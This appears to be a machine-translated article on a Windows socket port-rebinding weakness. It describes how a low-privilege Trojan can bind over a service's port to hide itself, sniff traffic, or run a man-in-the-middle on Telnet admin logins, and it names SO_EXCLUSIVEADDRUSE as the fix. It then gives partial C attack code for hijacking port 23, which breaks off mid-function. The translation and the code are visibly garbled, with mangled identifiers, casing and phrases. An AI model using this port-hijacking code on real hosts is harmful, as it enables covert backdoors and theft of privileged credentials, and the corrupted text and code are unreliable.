Port intercourse to implement port hidden, sigh and attack
In the programming of Windows Socket server applications, the following statements may be: s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = HTONL (INADDR_Any); bind (s, (Sockaddr *) & saddr, sizeof (saddr)); in fact, there is a very large security hazard, because in the implementation of Winsock, the binding of the server can be kept multiple bindings, who is determined who is used for multiple bindings? At the time, according to one principle, the designation of who is the most clear, no one, and no permission, that is, the user who can be rebound on the port of advanced privileges such as service startup, this is very A major security hazard. what does this mean? It means that you can perform the following attacks: 1. A Trojan binds to a port that has been legally existing on the port, and he judges his own package through his own specific package format, if it is handled, if it is not handed over to the real server application through 127.0.0.1 Treatment. 2. A Trojan can bind the port of the high-relocation service application, and perform the sniffing of the processing information. The communication that monitors a socket on a host requires very high privilege requirements, but it is actually re-tied with Socket. Declaration, you can easily monitor communication with this Socket programming vulnerability without having to use what hang, hook or low-level drive technology (you need administrator privileges to reach) 3. For some special applications, you can initiate an intermediary attack, get information or fact deception from low-rights users, such as blocking the 23 port of the Telnet server under Guest permission, if you use NTLM encryption certification, although you can't get the password directly Once the admin user logs in, your application can initiate a middle-aged attack, playing this login user to send high privileges through the socket, to the purpose of the invasion. In fact, the Socket programming of MS own services has such problems, and all of TELNET, FTP, and HTTP's service implementation can be used to attack, and the SYSTEM application is implemented on the low authority user. IIS including W2K SP3 is also the same, then if you can invade or take it with a low authority user, and the other party has opened these services, then you may wish. And I estimate that there are many third-party services that have many of this vulnerability. The solution is very simple. When writing as above, you need to use SetsockOpt to specify SO_EXCLUSIVEADDRUSE asking for exclusive port addresses, not allow multiplexing. This other people cannot be multiplexed. Below is an example of a simple intercept MS Telnet server, you can successfully intercept at Guest users, the remaining is that you have some special tailoring problems based on your own needs: such as hidden, sniffing data, high rights User spoof, etc. #include
#include
#include
#include
DWORD WINAPI ClientThread (LPVOID lpParam); int main () {WORD wVersionRequested; DWORD ret; WSADATA wsaData; BOOL val; SOCKADDR_IN saddr; SOCKADDR_IN scaddr; int err; SOCKET s; SOCKET sc; int caddsize; HANDLE mt; DWORD tid; wVersionRequested = MakeWord (2, 2); Err = WSASTARTUP (WVersionRequested, & WSADATA); if (Err! = 0) {Printf ("Error! WsaStartup Failed! / N"); return -1;} saddr.sin_family = AF_INET; / / Intercept can also specify an address as INADDR_any, but should not affect the normal application, you should specify specific IP, leave 127.0.0.1 to normal service applications, then use this address to forward, you can do not affect the other party SADDR.SIN_ADDR.S_ADDR = INET_ADDR ("192.168.0.60") is applied normally; Saddr.sin_Port = HTONS (23); if ((S = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) == Socket_ERROR) {Printf ("Error ! socket failed! / n "); return -1;} val = true; // SO_REUSEADDR option is IF (SETSOCKOPT (S, SOL_Socket, So_reuseaddr, (Char *) & Val, SIZEOF (VAL) )! = 0) {PrintF ("Error! SetsockOpt Failed! / N); return -1;} // If you specify SO_EXCLUSIVEADDRUSE, it will not bind success, return the unauthorized error code; // If you want By re-use the port to achieve hidden purposes, you can dynamically test which of the currently bound ports can be successful, indicating this vulnerability, then dynamically utilizing ports to make more hidden // actually UDP ports can be used to bind the use, This is mainly to attack if (Bind (s, (sockaddr *) as an example of Telnet service. & Saddr, SIZEOF (SADDR) == SOCKET_ERROR) {RET = getLastError (); Printf ("Error! Bind Failed! / N"); return -1;} listen (s, 2); while (1) {CADDSIZE = SIZEOF (SCADDR); // Accept Connection Request SC = Accept (S, Struct SockAddr *) & Scaddr, & Caddsize); if (sc! = invalid_socket) {MT = CreateThread (Null, 0, ClientthRead, (LPVOID) SC, 0 , & TID); if (MT == null) {Printf ("Thread Creat Failed! / N"); Break;}} CloseHandle (MT);} closesocket (s); wsacleanup (); return 0;} DWord WinAPI ClientThread (Lpvoid lpparam) {socket ss = (socket) lpparam; socket sc; unsigned char buf [4096];